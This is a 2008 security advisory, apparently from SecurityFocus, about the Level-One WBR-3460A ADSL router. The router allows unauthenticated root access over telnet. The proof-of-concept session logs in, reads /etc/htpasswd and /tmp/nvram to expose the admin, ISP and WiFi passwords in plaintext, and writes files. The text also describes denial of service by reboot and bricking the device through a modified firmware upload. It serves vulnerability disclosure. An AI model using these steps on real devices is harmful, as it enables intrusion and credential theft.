Level-One WBR-3460A Grants Root Access Jan 08 2008 12:24AM
anastasiosm gmail com
Advisory: Level-One WBR-3460A Grants Root Access

Risk: High

Vendor Status: Vendor has not released an updated version

Release Date: 08/01/2008

Last Modified: 01/01/2008

Author: Anastasios Monachos [anastasiosm(at)gmail(dot)com]

I Affected Products:

====================

Level-One WBR-3460A latest firmware available 1.00.12

Level-One WBR-3460A firmware version 1.00.11

II Non-affected Products:

=========================

WBR-3460A comes with firmware version 1.00.06 installed, this happens to be the only available version that is not affected by the vulnerability described below, however it lacks of WPA2-PSK support and also of external/internal port mapping in Virtual servers configuration page, amongst other things.

II Background:

==============

The Level-One WBR-3460A is an ADSL2/2+ Modem/Wireless Router which runs Linux BusyBox v0.61.pre on a 32-bit RISC 4KEc V4.8 processor at 211 BogoMIPS, it incorporates 14 MB of RAM and four 10/100 Ethernet ports.

III Description:

================

Performing an nmap scan on the internal address I came up with the following:

PORT STATE SERVICE

23/tcp open telnet

80/tcp open http

Port 80 gives access through an HTML interface to the configuration menu as would be expected, but although you can control access to that interface using a password, there is no control over the telnet port. So, telnetting to port 23 (on is default IP 192.168.0.1) the users get automatically access to the filesystem, by providing no credentials at all. Now the file system of the device may be used for malicious communication and temporary data storage. Too, a user may download the upgrade firware's HTML code from the www directory and modify it locally so allow other files than IMGs to be uploaded and replace the existing firmware, making the device useless.

Also, one can view the contents of /etc/htpasswd file, where everything is in plaintext, and retrieve the web-based administrator's (admin) password. Some of the possible implications, that can be triggered from the web-interface, but not limited to the following, are:

1. Intruders are now capable to open the configuration page and go through the submenus where they can get the wireless key in use (the wireless key is being displayed in plaintext, as well)

2. They can perform a trivial DoS attack (factory restart the modem and everything stops working) similarly from the telnet session, by issuing the command "reboot" the device will obey and it will restart itself

3. They can change configurations and policies for clients causing confusion

4. Or they could download a backup copy of the configuration file for the device (the same file can be obtained by viewing the contents of "/tmp/nvram"); by viewing that file one can easily extract the ADSL account logins or any other information is curious about, as everything is stored in plaintext - once again)

IV Vulnerability Exploited Successfully:

========================================

1. While we were connected through the Ethernet interface, and

2. While we were connected via the security-enabled (WPA2-PSK) wireless network we had setup (and our wireless NIC's MAC address was in the list of the trusted MACs)

V Proof of Concept:

===================

tasos@nyx:~$ telnet 192.168.0.1

Trying 192.168.0.1...

Connected to 192.168.0.1.

Escape character is '^]'.

BusyBox v0.61.pre (2007.03.16-05:39+0000) Built-in shell (ash)

Enter 'help' for a list of built-in commands.

# ls

bin dev etc lib proc sbin tmp usr var www

#

# ls /proc/

1 3 84 dma loadavg stat

107 3035 86 driver locks swaps

108 4 87 execdomains meminfo sys

110 43 89 filesystems misc sysvipc

111 4456 91 fs modules ticfg

112 5 92 interrupts mounts tty

1192 5233 avalanche iomem mtd uptime

124 5237 br_filter ioports net version

130 5239 br_trigger kcore partitions wlan

132 6 bus kmsg push_button

2 68 cmdline ksyms self

20 7 cpuinfo led slabinfo

246 80 devices led_mod special

#

# cat /etc/htpasswd

admin:MySecretPassword

#

# echo "any data" > /etc/filename

#

# cat /etc/filename

any data

#

# cat /tmp/nvram

IP806GAV3 time_zone=GMT+0 time_daylight= restore_default=0

(...removed for simplicity...)

dhcp_reserved= http_username=admin http_password=32spec904et28 http_timeout=5

(...removed for simplicity...)

pppoe_username=xxxxxxx.xxxxxx.xxxxx (at) myisp (dot) mycc [email concealed]tld pppoe_password=xxxxxxxx

(...removed for simplicity...)

wifi_access_list=00:1B:72:23:00:51Tasos-Laptop 00:01:71:97:86:0BTasos-WDongle

(...removed for simplicity...)

wifi_present=1 wiz_runtest= ipoa_mode= wifi_psk_pwd=Js5xxkwD3fvtxxxxx645KdLxxxxxx

#

VI Misc:

========

i. Please note that if the modem/router get power-cycled any file that had been created earlier will be vanished

ii. All three versions of the firmware that were tested had no open ports visible from the Internet

VII References:

===============

i. Level One WBR-3460A - http://global.level1.com/products2.php?Id=821

VIII Disclosure Timeline:

========================

01. January 2008 - Contacted Level-One by email through http://global.level1.com/email.php (No Response)

08. January 2008 - Advisory was released on SecurityFocus(TM) and SecurityTracker(SM)

IX Legal Notice:

================

Copyright 2008 Anastasios Monachos [anastasiosm(at)gmail(dot)com]

The information in the advisory is believed to be accurate at the time

of publishing, based on currently available information. Use of the

information constitutes acceptance for use in an AS IS condition. There

are no warranties with regard to this information, and the author does

not accept any liability for any direct, indirect, or consequential

loss or damage arising from use of, or reliance on, this information.

Permission is granted for the redistribution of this alert, as long as

this Legal Notice remains intact.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus